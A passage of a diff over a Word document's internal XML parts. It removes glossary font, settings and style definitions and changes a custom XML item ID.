-    <w:pitch w:val="fixed"/>
-    <w:sig w:usb0="E0002AFF" w:usb1="C0007843" w:usb2="00000009" w:usb3="00000000" w:csb0="000001FF" w:csb1="00000000"/>
-  </w:font>
-  <w:font w:name="Wingdings">
-    <w:panose1 w:val="05000000000000000000"/>
-    <w:charset w:val="02"/>
-    <w:family w:val="auto"/>
-    <w:pitch w:val="variable"/>
-    <w:sig w:usb0="00000000" w:usb1="10000000" w:usb2="00000000" w:usb3="00000000" w:csb0="80000000" w:csb1="00000000"/>
-  </w:font>
-  <w:font w:name="Calibri">
-    <w:panose1 w:val="020F0502020204030204"/>
-    <w:charset w:val="CC"/>
-    <w:family w:val="swiss"/>
-    <w:pitch w:val="variable"/>
-    <w:sig w:usb0="E00002FF" w:usb1="4000ACFF" w:usb2="00000001" w:usb3="00000000" w:csb0="0000019F" w:csb1="00000000"/>
-  </w:font>
-  <w:font w:name="Cambria">
-    <w:panose1 w:val="02040503050406030204"/>
-    <w:charset w:val="CC"/>
-    <w:family w:val="roman"/>
-    <w:pitch w:val="variable"/>
-    <w:sig w:usb0="E00002FF" w:usb1="400004FF" w:usb2="00000000" w:usb3="00000000" w:csb0="0000019F" w:csb1="00000000"/>
-  </w:font>
-  <w:font w:name="Tahoma">
-    <w:panose1 w:val="020B0604030504040204"/>
-    <w:charset w:val="CC"/>
-    <w:family w:val="swiss"/>
-    <w:pitch w:val="variable"/>
-    <w:sig w:usb0="E1002EFF" w:usb1="C000605B" w:usb2="00000029" w:usb3="00000000" w:csb0="000101FF" w:csb1="00000000"/>
-  </w:font>
-</w:fonts>
-</file>
-
-<file path=word/glossary/settings.xml><?xml version="1.0" encoding="utf-8"?>
-<w:settings xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:sl="http://schemas.openxmlformats.org/schemaLibrary/2006/main">
-  <w:view w:val="normal"/>
-  <w:defaultTabStop w:val="708"/>
-  <w:characterSpacingControl w:val="doNotCompress"/>
-  <w:compat>
-    <w:useFELayout/>
-  </w:compat>
-  <w:rsids>
-    <w:rsidRoot w:val="006F2E8D"/>
-    <w:rsid w:val="006F2E8D"/>
-  </w:rsids>
-  <m:mathPr>
-    <m:mathFont m:val="Cambria Math"/>
-    <m:brkBin m:val="before"/>
-    <m:brkBinSub m:val="--"/>
-    <m:smallFrac m:val="off"/>
-    <m:dispDef/>
-    <m:lMargin m:val="0"/>
-    <m:rMargin m:val="0"/>
-    <m:defJc m:val="centerGroup"/>
-    <m:wrapIndent m:val="1440"/>
-    <m:intLim m:val="subSup"/>
-    <m:naryLim m:val="undOvr"/>
-  </m:mathPr>
-  <w:themeFontLang w:val="ru-RU"/>
-  <w:clrSchemeMapping w:bg1="light1" w:t1="dark1" w:bg2="light2" w:t2="dark2" w:accent1="accent1" w:accent2="accent2" w:accent3="accent3" w:accent4="accent4" w:accent5="accent5" w:accent6="accent6" w:hyperlink="hyperlink" w:followedHyperlink="followedHyperlink"/>
-  <w:decimalSymbol w:val=","/>
-  <w:listSeparator w:val=";"/>
-</w:settings>
-</file>
-
-<file path=word/glossary/styles.xml><?xml version="1.0" encoding="utf-8"?>
-<w:styles xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">
-  <w:docDefaults>
-    <w:rPrDefault>
-      <w:rPr>
-        <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
-        <w:sz w:val="22"/>
-        <w:szCs w:val="22"/>
-        <w:lang w:val="ru-RU" w:eastAsia="ru-RU" w:bidi="ar-SA"/>
-      </w:rPr>
-    </w:rPrDefault>
-    <w:pPrDefault>
-      <w:pPr>
-        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
-      </w:pPr>
-    </w:pPrDefault>
-  </w:docDefaults>
-  <w:latentStyles w:defLockedState="0" w:defUIPriority="99" w:defSemiHidden="1" w:defUnhideWhenUsed="1" w:defQFormat="0" w:count="267">
-    <w:lsdException w:name="Normal" w:semiHidden="0" w:uiPriority="0" w:unhideWhenUsed="0" w:qFormat="1"/>
-    <w:lsdException w:name="heading 1" w:semiHidden="0" w:uiPriority="9" w:unhideWhenUsed="0" w:qFormat="1"/>
-    <w:lsdException w:name="heading 2" w:uiPriority="9" w:qFormat="1"/>
-    <w:lsdException w:name="heading 3" w:uiPriority="9" w:qFormat="1"/>
-    <w:lsdException w:name="heading 4" w:uiPriority="9" w:qFormat="1"/>
-    <w:lsdException w:name="heading 5" w:uiPriority="9" w:qFormat="1"/>
-    <w:lsdException w:name="heading 6" w:uiPriority="9" w:qFormat="1"/>
-    <w:lsdException w:name="heading 7" w:uiPriority="9" w:qFormat="1"/>
-    <w:lsdException w:name="heading 8" w:uiPriority="9" w:qFormat="1"/>
-    <w:lsdException w:name="heading 9" w:uiPriority="9" w:qFormat="1"/>
-    <w:lsdException w:name="toc 1" w:uiPriority="39"/>
-    <w:lsdException w:name="toc 2" w:uiPriority="39"/>
-    <w:lsdException w:name="toc 3" w:uiPriority="39"/>
-    <w:lsdException w:name="toc 4" w:uiPriority="39"/>
-    <w:lsdException w:name="toc 5" w:uiPriority="39"/>
-    <w:lsdException w:name="toc 6" w:uiPriority="39"/>
-    <w:lsdException w:name="toc 7" w:uiPriority="39"/>
-    <w:lsdException w:name="toc 8" w:uiPriority="39"/>
-    <w:lsdException w:name="toc 9" w:uiPriority="39"/>
-    <w:lsdException w:name="caption" w:uiPriority="35" w:qFormat="1"/>
-    <w:lsdException w:name="Title" w:semiHidden="0" w:uiPriority="10" w:unhideWhenUsed="0" w:qFormat="1"/>
-    <w:lsdException w:name="Default Paragraph Font" w:uiPriority="1"/>
-    <w:lsdException w:name="Subtitle" w:semiHidden="0" w:uiPriority="11" w:unhideWhenUsed="0" w:qFormat="1"/>
-    <w:lsdException w:name="Strong" w:semiHidden="0" w:uiPriority="22" w:unhideWhenUsed="0" w:qFormat="1"/>
-    <w:lsdException w:name="Emphasis" w:semiHidden="0" w:uiPriority="20" w:unhideWhenUsed="0" w:qFormat="1"/>
-    <w:lsdException w:name="Table Grid" w:semiHidden="0" w:uiPriority="59" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Placeholder Text" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="No Spacing" w:semiHidden="0" w:uiPriority="1" w:unhideWhenUsed="0" w:qFormat="1"/>
-    <w:lsdException w:name="Light Shading" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Light List" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Light Grid" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Shading 1" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Shading 2" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium List 1" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium List 2" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Grid 1" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Grid 2" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Grid 3" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Dark List" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Colorful Shading" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Colorful List" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Colorful Grid" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Light Shading Accent 1" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Light List Accent 1" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Light Grid Accent 1" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Shading 1 Accent 1" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Shading 2 Accent 1" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium List 1 Accent 1" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Revision" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="List Paragraph" w:semiHidden="0" w:uiPriority="34" w:unhideWhenUsed="0" w:qFormat="1"/>
-    <w:lsdException w:name="Quote" w:semiHidden="0" w:uiPriority="29" w:unhideWhenUsed="0" w:qFormat="1"/>
-    <w:lsdException w:name="Intense Quote" w:semiHidden="0" w:uiPriority="30" w:unhideWhenUsed="0" w:qFormat="1"/>
-    <w:lsdException w:name="Medium List 2 Accent 1" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Grid 1 Accent 1" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Grid 2 Accent 1" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Grid 3 Accent 1" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Dark List Accent 1" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Colorful Shading Accent 1" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Colorful List Accent 1" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Colorful Grid Accent 1" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Light Shading Accent 2" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Light List Accent 2" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Light Grid Accent 2" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Shading 1 Accent 2" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Shading 2 Accent 2" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium List 1 Accent 2" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium List 2 Accent 2" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Grid 1 Accent 2" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Grid 2 Accent 2" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Grid 3 Accent 2" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Dark List Accent 2" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Colorful Shading Accent 2" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Colorful List Accent 2" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Colorful Grid Accent 2" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Light Shading Accent 3" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Light List Accent 3" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Light Grid Accent 3" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Shading 1 Accent 3" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Shading 2 Accent 3" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium List 1 Accent 3" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium List 2 Accent 3" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Grid 1 Accent 3" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Grid 2 Accent 3" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Grid 3 Accent 3" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Dark List Accent 3" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Colorful Shading Accent 3" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Colorful List Accent 3" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Colorful Grid Accent 3" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Light Shading Accent 4" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Light List Accent 4" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Light Grid Accent 4" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Shading 1 Accent 4" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Shading 2 Accent 4" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium List 1 Accent 4" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium List 2 Accent 4" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Grid 1 Accent 4" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Grid 2 Accent 4" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Grid 3 Accent 4" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Dark List Accent 4" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Colorful Shading Accent 4" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Colorful List Accent 4" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Colorful Grid Accent 4" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Light Shading Accent 5" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Light List Accent 5" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Light Grid Accent 5" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Shading 1 Accent 5" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Shading 2 Accent 5" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium List 1 Accent 5" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium List 2 Accent 5" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Grid 1 Accent 5" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Grid 2 Accent 5" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Grid 3 Accent 5" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Dark List Accent 5" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Colorful Shading Accent 5" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Colorful List Accent 5" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Colorful Grid Accent 5" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Light Shading Accent 6" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Light List Accent 6" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Light Grid Accent 6" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Shading 1 Accent 6" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Shading 2 Accent 6" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium List 1 Accent 6" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium List 2 Accent 6" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Grid 1 Accent 6" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Grid 2 Accent 6" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Grid 3 Accent 6" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Dark List Accent 6" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Colorful Shading Accent 6" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Colorful List Accent 6" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Colorful Grid Accent 6" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Subtle Emphasis" w:semiHidden="0" w:uiPriority="19" w:unhideWhenUsed="0" w:qFormat="1"/>
-    <w:lsdException w:name="Intense Emphasis" w:semiHidden="0" w:uiPriority="21" w:unhideWhenUsed="0" w:qFormat="1"/>
-    <w:lsdException w:name="Subtle Reference" w:semiHidden="0" w:uiPriority="31" w:unhideWhenUsed="0" w:qFormat="1"/>
-    <w:lsdException w:name="Intense Reference" w:semiHidden="0" w:uiPriority="32" w:unhideWhenUsed="0" w:qFormat="1"/>
-    <w:lsdException w:name="Book Title" w:semiHidden="0" w:uiPriority="33" w:unhideWhenUsed="0" w:qFormat="1"/>
-    <w:lsdException w:name="Bibliography" w:uiPriority="37"/>
-    <w:lsdException w:name="TOC Heading" w:uiPriority="39" w:qFormat="1"/>
-  </w:latentStyles>
-  <w:style w:type="paragraph" w:default="1" w:styleId="a">
-    <w:name w:val="Normal"/>
-    <w:qFormat/>
-  </w:style>
-  <w:style w:type="character" w:default="1" w:styleId="a0">
-    <w:name w:val="Default Paragraph Font"/>
-    <w:uiPriority w:val="1"/>
-    <w:semiHidden/>
-    <w:unhideWhenUsed/>
-  </w:style>
-  <w:style w:type="table" w:default="1" w:styleId="a1">
-    <w:name w:val="Normal Table"/>
-    <w:uiPriority w:val="99"/>
-    <w:semiHidden/>
-    <w:unhideWhenUsed/>
-    <w:qFormat/>
-    <w:tblPr>
-      <w:tblInd w:w="0" w:type="dxa"/>
-      <w:tblCellMar>
-        <w:top w:w="0" w:type="dxa"/>
-        <w:left w:w="108" w:type="dxa"/>
-        <w:bottom w:w="0" w:type="dxa"/>
-        <w:right w:w="108" w:type="dxa"/>
-      </w:tblCellMar>
-    </w:tblPr>
-  </w:style>
-  <w:style w:type="numbering" w:default="1" w:styleId="a2">
-    <w:name w:val="No List"/>
-    <w:uiPriority w:val="99"/>
-    <w:semiHidden/>
-    <w:unhideWhenUsed/>
-  </w:style>
-  <w:style w:type="paragraph" w:customStyle="1" w:styleId="82C605AFF9394662B96C710CDC2B0F65">
-    <w:name w:val="82C605AFF9394662B96C710CDC2B0F65"/>
-    <w:rsid w:val="006F2E8D"/>
-  </w:style>
-  <w:style w:type="paragraph" w:customStyle="1" w:styleId="06956996F20F4098BF4A67AB934BFD11">
-    <w:name w:val="06956996F20F4098BF4A67AB934BFD11"/>
-    <w:rsid w:val="006F2E8D"/>
-  </w:style>
-  <w:style w:type="paragraph" w:customStyle="1" w:styleId="9AB34CEC44F64AD2BC675B3B95A28D84">
-    <w:name w:val="9AB34CEC44F64AD2BC675B3B95A28D84"/>
-    <w:rsid w:val="006F2E8D"/>
-  </w:style>
-  <w:style w:type="paragraph" w:customStyle="1" w:styleId="5E0DE3F6D6B64AE78CD5121F82429460">
-    <w:name w:val="5E0DE3F6D6B64AE78CD5121F82429460"/>
-    <w:rsid w:val="006F2E8D"/>
-  </w:style>
-  <w:style w:type="paragraph" w:customStyle="1" w:styleId="AC39084BF3B342409F15784A05AC0B7C">
-    <w:name w:val="AC39084BF3B342409F15784A05AC0B7C"/>
-    <w:rsid w:val="006F2E8D"/>
-  </w:style>
-  <w:style w:type="paragraph" w:customStyle="1" w:styleId="DFE5B95169FC4E07988D937567AB1673">
-    <w:name w:val="DFE5B95169FC4E07988D937567AB1673"/>
-    <w:rsid w:val="006F2E8D"/>
-  </w:style>
-</w:styles>
-</file>
-
-<file path=word/glossary/webSettings.xml><?xml version="1.0" encoding="utf-8"?>
-<w:webSettings xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">
-  <w:optimizeForBrowser/>
-</w:webSettings>
-</file>
-
 <file path=word/theme/theme1.xml><?xml version="1.0" encoding="utf-8"?>
 <a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="Тема Office">
   <a:themeElements>
@@ -37674,7 +38574,7 @@
 </file>
 
 <file path=customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
-<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{DD6B33C0-B189-4D6E-BDBA-BC2234A99BA1}">
+<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{612A1CB6-61F4-4D79-9110-2A75CDFFF291}">
   <ds:schemaRefs>
     <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/officeDocument/2006/bibliography"/>
   </ds:schemaRefs>
